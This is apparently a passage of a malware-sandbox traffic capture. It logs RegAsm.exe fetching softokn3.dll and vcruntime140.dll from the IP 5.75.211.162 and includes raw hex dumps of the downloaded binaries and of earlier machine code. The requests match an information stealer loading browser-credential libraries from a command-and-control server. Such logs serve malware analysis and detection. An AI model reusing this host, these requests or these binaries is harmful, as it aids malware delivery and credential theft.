                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                    Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                    Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                    Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                    Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                    Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                    Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                    Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                    2024-09-26 22:14:48 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                    Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.4497545.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:49 UTC197OUTGET /softokn3.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:49 UTC262INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:49 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 257872
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:49 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:49 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                    Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                    Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                    Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                    Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                    Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                    Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                    Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                    Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                    2024-09-26 22:14:49 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                    Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.4497555.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:50 UTC201OUTGET /vcruntime140.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:51 UTC261INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:50 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 80880
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:50 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:51 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                    2024-09-26 22:14:52 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
